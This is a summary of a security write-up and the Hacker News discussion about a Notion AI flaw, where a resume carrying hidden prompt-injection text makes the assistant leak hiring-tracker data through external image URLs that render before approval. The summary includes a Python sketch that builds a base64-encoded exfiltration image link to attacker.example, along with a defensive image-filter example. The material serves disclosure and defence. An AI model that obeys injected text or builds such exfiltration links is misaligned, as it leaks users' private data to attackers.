Notion AI Pre-Approval Edits Enable Prompt-Injection Data Exfiltration

Notion AI applies AI-driven edits before the user approves them, allowing prompt-injected content to exfiltrate data by inserting external image URLs that the browser fetches immediately. The attack was demonstrated with a resume containing a hidden injection that leaked hiring-tracker details, and a related exposure exists in Notion Mail's drafting assistant. While organizations can reduce the risk with settings and practices, the authors argue Notion must implement stronger, platform-level defenses; Notion closed their disclosure as 'Not Applicable', after which the authors published it.
Key Points
- Notion AI saves and renders AI edits before user approval, enabling indirect prompt injection to exfiltrate data via external image requests.
- A poisoned resume instructs Notion AI to embed hiring-tracker contents into an attacker-controlled image URL; the browser fetch leaks the data regardless of user consent.
- Notion’s LLM-based document scanning can be bypassed; injections can reside in uploads, web pages, Notion pages, or connected data sources.
- Notion Mail’s drafting assistant also renders external Markdown images in drafts, creating a narrower but real exfiltration path.
- Mitigations for users/orgs reduce risk but don’t eliminate it; the authors recommend Notion block external image rendering in AI outputs, enforce strong CSP, and fix CDN redirect issues.
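To make the exfiltration mechanics concrete, here is a minimal sketch of the kind of Markdown an injected prompt coaxes the model into emitting; the attacker domain, path, and data are hypothetical illustrations, not details from the write-up:

```python
import base64

# Hypothetical private data the assistant can read (e.g. hiring-tracker rows).
private_rows = ["Alice Smith, offer extended", "Bob Jones, rejected"]

# The injected instructions ask the model to encode that data into the
# query string of an attacker-controlled image URL.
payload = base64.urlsafe_b64encode("\n".join(private_rows).encode()).decode()
exfil_markdown = f"![status](https://attacker.example/pixel.gif?d={payload})"

# When the AI edit is saved and rendered before approval, the browser
# fetches this URL automatically, delivering the encoded rows to the
# attacker's server -- no click or user consent involved.
print(exfil_markdown)
```

The key property is that rendering alone triggers the leak: the image request fires as soon as the draft is displayed, which is why pre-approval rendering of AI output is the root issue.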
Sentiment
The overall sentiment of the Hacker News discussion is highly critical and concerned. Commenters largely agree with the article's findings and express significant dissatisfaction with Notion's security practices, particularly their handling of the vulnerability disclosure. There's a strong undercurrent of distrust towards SaaS platforms and AI integrations, leading to calls for greater accountability and consideration of self-hosted or native alternatives.
In Agreement
- Securing LLMs presents a fundamentally different challenge due to the 'infinite' attack space of human language, requiring outputs to be treated as untrusted and necessitating classic cybersecurity guardrails like sandboxing and data permissioning.
- The vulnerability is an instance of the 'Lethal Trifecta' (access to private data, untrusted input, and external communication), where Markdown images are a frequently overlooked vector for data exfiltration.
- Notion's handling reflects 'sloppy coding': rendering potentially dangerous links without user permission, compounded by an even worse response in closing the disclosure as 'Not Applicable'.
- Notion has a concerning pattern of not taking AI security seriously, as evidenced by previous data exfiltration vulnerabilities identified in their 3.0 agents release.
- There's a broader systemic issue with companies that fail to secure user data and a lack of effective societal mechanisms to hold them proportionally accountable.
- The core problem lies in web browsers automatically fetching embedded URLs without explicit user permission, leading some to call for a return to desktop software for greater security and control.
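The "treat LLM outputs as untrusted" guardrail above can be sketched as a render-side filter that strips Markdown images pointing at non-allowlisted hosts before the browser ever sees them. The allowlist, regex, and function name below are illustrative assumptions, not Notion's actual implementation:

```python
import re
from urllib.parse import urlparse

# Hosts the renderer is allowed to load images from; everything else is
# stripped before the AI-generated Markdown reaches the browser.
# (Hypothetical allowlist -- a real deployment would use its own CDN hosts.)
ALLOWED_IMAGE_HOSTS = {"notion.so", "notion.site"}

# Matches Markdown image syntax: ![alt](url ...)
MD_IMAGE = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)[^)]*\)")

def strip_external_images(markdown: str) -> str:
    """Replace images on non-allowlisted hosts with their alt text."""
    def repl(m: re.Match) -> str:
        alt, url = m.group(1), m.group(2)
        host = urlparse(url).hostname or ""
        if host in ALLOWED_IMAGE_HOSTS or any(
            host.endswith("." + h) for h in ALLOWED_IMAGE_HOSTS
        ):
            return m.group(0)  # trusted host: keep the image as-is
        return alt  # untrusted host: drop the fetch, keep only the text
    return MD_IMAGE.sub(repl, markdown)

poisoned = "Summary ![pixel](https://attacker.example/leak?d=c2VjcmV0)"
print(strip_external_images(poisoned))  # -> "Summary pixel"
```

Output-side filtering like this complements, rather than replaces, a strict Content-Security-Policy: the CSP stops the browser from fetching anything that slips through, while the filter keeps the exfiltration payload out of the stored document entirely.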
Opposed
- There were no direct opposing viewpoints to the article's findings or the existence of the vulnerability. Some commenters offered broader philosophical takes on LLM security or alternative solutions, but none disputed the claims made in the article.